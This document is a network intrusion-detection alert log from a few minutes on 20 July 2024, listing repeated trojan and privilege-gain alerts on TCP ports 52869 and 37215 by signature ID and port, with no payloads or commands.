                      Timestamp:07/20/24-23:05:45.749770
                      SID:2027339
                      Source Port:36974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.582686
                      SID:2025132
                      Source Port:50050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:19.575886
                      SID:2025132
                      Source Port:53176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.201041
                      SID:2025132
                      Source Port:60628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.974201
                      SID:2025132
                      Source Port:55136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.325897
                      SID:2835222
                      Source Port:38410
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:51.729184
                      SID:2025132
                      Source Port:42958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.601961
                      SID:2831300
                      Source Port:38338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.656192
                      SID:2829579
                      Source Port:56002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.897315
                      SID:2027339
                      Source Port:45242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.516715
                      SID:2831300
                      Source Port:60856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:12.647376
                      SID:2027339
                      Source Port:43446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.136809
                      SID:2831300
                      Source Port:48092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.086079
                      SID:2835222
                      Source Port:50520
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.662485
                      SID:2829579
                      Source Port:38920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327823
                      SID:2835222
                      Source Port:55230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.542289
                      SID:2831300
                      Source Port:54550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.409134
                      SID:2829579
                      Source Port:34730
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.667246
                      SID:2025132
                      Source Port:35168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.446803
                      SID:2831300
                      Source Port:33754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.772622
                      SID:2027339
                      Source Port:54474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.661785
                      SID:2027339
                      Source Port:36092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.570834
                      SID:2027339
                      Source Port:54386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.048573
                      SID:2829579
                      Source Port:43692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.574592
                      SID:2027339
                      Source Port:56626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.556915
                      SID:2831300
                      Source Port:40874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:40.564079
                      SID:2025132
                      Source Port:45310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.453690
                      SID:2027339
                      Source Port:41236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.943746
                      SID:2025132
                      Source Port:43756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.606012
                      SID:2831300
                      Source Port:47396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.474845
                      SID:2027339
                      Source Port:49658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.811748
                      SID:2025132
                      Source Port:53994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.056582
                      SID:2835222
                      Source Port:40042
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.391443
                      SID:2027339
                      Source Port:34314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.622534
                      SID:2835222
                      Source Port:41910
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.822681
                      SID:2025132
                      Source Port:52732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.325773
                      SID:2829579
                      Source Port:34302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.430092
                      SID:2027339
                      Source Port:51520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.204720
                      SID:2025132
                      Source Port:49340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.709144
                      SID:2027339
                      Source Port:50946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.758911
                      SID:2831300
                      Source Port:48530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.997034
                      SID:2027339
                      Source Port:45512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.801044
                      SID:2027339
                      Source Port:44588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.036527
                      SID:2835222
                      Source Port:49190
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.394050
                      SID:2027339
                      Source Port:42840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.786611
                      SID:2025132
                      Source Port:33442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.274610
                      SID:2025132
                      Source Port:51318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.058741
                      SID:2025132
                      Source Port:35430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.849854
                      SID:2027339
                      Source Port:41822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.454499
                      SID:2831300
                      Source Port:48144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.893152
                      SID:2027339
                      Source Port:33368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.106479
                      SID:2027339
                      Source Port:53776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:20.035971
                      SID:2027339
                      Source Port:32902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.571973
                      SID:2027339
                      Source Port:59612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.972042
                      SID:2025132
                      Source Port:36494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.612113
                      SID:2831300
                      Source Port:44166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:16.731750
                      SID:2025132
                      Source Port:37612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.275898
                      SID:2027339
                      Source Port:35062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.118555
                      SID:2025132
                      Source Port:58444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.191114
                      SID:2027339
                      Source Port:35644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.324702
                      SID:2831300
                      Source Port:45836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.421092
                      SID:2831300
                      Source Port:37374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.017303
                      SID:2831300
                      Source Port:55684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.193921
                      SID:2025132
                      Source Port:37256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.444876
                      SID:2831300
                      Source Port:52012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.446932
                      SID:2027339
                      Source Port:40346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.462908
                      SID:2027339
                      Source Port:33822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.843525
                      SID:2025132
                      Source Port:50212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.971654
                      SID:2829579
                      Source Port:33102
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.875016
                      SID:2027339
                      Source Port:58594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.680161
                      SID:2835222
                      Source Port:49262
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.988990
                      SID:2829579
                      Source Port:51382
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.827188
                      SID:2027339
                      Source Port:40270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.986039
                      SID:2027339
                      Source Port:60458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.536919
                      SID:2027339
                      Source Port:52448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.048493
                      SID:2025132
                      Source Port:59600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.257796
                      SID:2027339
                      Source Port:56554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.557201
                      SID:2829579
                      Source Port:45568
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:04.345966
                      SID:2027339
                      Source Port:60696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.714340
                      SID:2025132
                      Source Port:37664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:34.260416
                      SID:2025132
                      Source Port:37838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:21.839686
                      SID:2025132
                      Source Port:33196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.117518
                      SID:2027339
                      Source Port:39610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.153869
                      SID:2027339
                      Source Port:35276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.788274
                      SID:2829579
                      Source Port:57776
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.006675
                      SID:2025132
                      Source Port:49290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.498027
                      SID:2829579
                      Source Port:34272
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.074396
                      SID:2027339
                      Source Port:55278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.437584
                      SID:2829579
                      Source Port:51586
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.113509
                      SID:2027339
                      Source Port:35976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.494301
                      SID:2025132
                      Source Port:54440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.256029
                      SID:2829579
                      Source Port:40820
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:12.667310
                      SID:2025132
                      Source Port:59718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.570741
                      SID:2027339
                      Source Port:34052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.080473
                      SID:2027339
                      Source Port:40774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.684507
                      SID:2025132
                      Source Port:60418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.971446
                      SID:2831300
                      Source Port:38060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.325662
                      SID:2835222
                      Source Port:51348
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.472706
                      SID:2027339
                      Source Port:55108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.476168
                      SID:2831300
                      Source Port:50064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:55.877930
                      SID:2835222
                      Source Port:58998
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.651508
                      SID:2027339
                      Source Port:51514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.455022
                      SID:2027339
                      Source Port:50814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.832966
                      SID:2027339
                      Source Port:34898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.123303
                      SID:2027339
                      Source Port:49444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.345691
                      SID:2027339
                      Source Port:50464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:36.558559
                      SID:2027339
                      Source Port:50544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.471609
                      SID:2831300
                      Source Port:54360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.627949
                      SID:2835222
                      Source Port:34958
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.230869
                      SID:2831300
                      Source Port:59134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.782204
                      SID:2027339
                      Source Port:32906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.032993
                      SID:2831300
                      Source Port:60092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.504672
                      SID:2027339
                      Source Port:42720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.888801
                      SID:2027339
                      Source Port:53676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.246572
                      SID:2025132
                      Source Port:45802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.487251
                      SID:2027339
                      Source Port:51654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.575004
                      SID:2025132
                      Source Port:38174
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.957923
                      SID:2829579
                      Source Port:56602
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.497924
                      SID:2025132
                      Source Port:39870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.170018
                      SID:2027339
                      Source Port:55752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.320247
                      SID:2025132
                      Source Port:36016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.208973
                      SID:2027339
                      Source Port:48192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.543705
                      SID:2027339
                      Source Port:45066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.547041
                      SID:2027339
                      Source Port:46506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.065114
                      SID:2027339
                      Source Port:42696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.450049
                      SID:2831300
                      Source Port:60300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.838207
                      SID:2025132
                      Source Port:40042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.101729
                      SID:2829579
                      Source Port:37728
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.373833
                      SID:2027339
                      Source Port:49186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.290948
                      SID:2831300
                      Source Port:35632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.018251
                      SID:2025132
                      Source Port:36280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.378138
                      SID:2025132
                      Source Port:46148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.138503
                      SID:2831300
                      Source Port:40162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.981181
                      SID:2027339
                      Source Port:41850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.904017
                      SID:2025132
                      Source Port:48780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.564288
                      SID:2027339
                      Source Port:46656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.196025
                      SID:2025132
                      Source Port:36472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.614915
                      SID:2025132
                      Source Port:57316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:34.258673
                      SID:2831300
                      Source Port:47128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.325773
                      SID:2829579
                      Source Port:33426
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.584864
                      SID:2829579
                      Source Port:35754
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.328888
                      SID:2835222
                      Source Port:40416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.358816
                      SID:2027339
                      Source Port:57788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:03.833995
                      SID:2025132
                      Source Port:57632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:04.503671
                      SID:2831300
                      Source Port:59586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.830272
                      SID:2829579
                      Source Port:49870
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.009825
                      SID:2025132
                      Source Port:52926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.216313
                      SID:2027339
                      Source Port:40518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.945198
                      SID:2835222
                      Source Port:60958
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.058741
                      SID:2027339
                      Source Port:33912
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.047734
                      SID:2829579
                      Source Port:56826
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.382234
                      SID:2027339
                      Source Port:47948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.120505
                      SID:2027339
                      Source Port:41328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.110617
                      SID:2027339
                      Source Port:51398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.481216
                      SID:2027339
                      Source Port:43564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.449834
                      SID:2027339
                      Source Port:51706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.376608
                      SID:2835222
                      Source Port:56542
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.090929
                      SID:2025132
                      Source Port:39166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.328888
                      SID:2829579
                      Source Port:58208
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.285913
                      SID:2027339
                      Source Port:39326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.290476
                      SID:2027339
                      Source Port:50258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:07.493314
                      SID:2831300
                      Source Port:59114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.159948
                      SID:2835222
                      Source Port:55306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.945487
                      SID:2829579
                      Source Port:59072
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.413672
                      SID:2831300
                      Source Port:53210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.018219
                      SID:2025132
                      Source Port:36466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:28.937691
                      SID:2027339
                      Source Port:60680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.391419
                      SID:2025132
                      Source Port:45958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.462008
                      SID:2831300
                      Source Port:33274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.554912
                      SID:2835222
                      Source Port:49054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.719355
                      SID:2835222
                      Source Port:36060
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.777436
                      SID:2829579
                      Source Port:50618
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.916294
                      SID:2025132
                      Source Port:57072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:07.071207
                      SID:2025132
                      Source Port:52532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.661756
                      SID:2835222
                      Source Port:43344
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.616747
                      SID:2025132
                      Source Port:49786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.344973
                      SID:2027339
                      Source Port:45966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.179441
                      SID:2831300
                      Source Port:56516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.701650
                      SID:2831300
                      Source Port:43966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.528919
                      SID:2829579
                      Source Port:46836
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
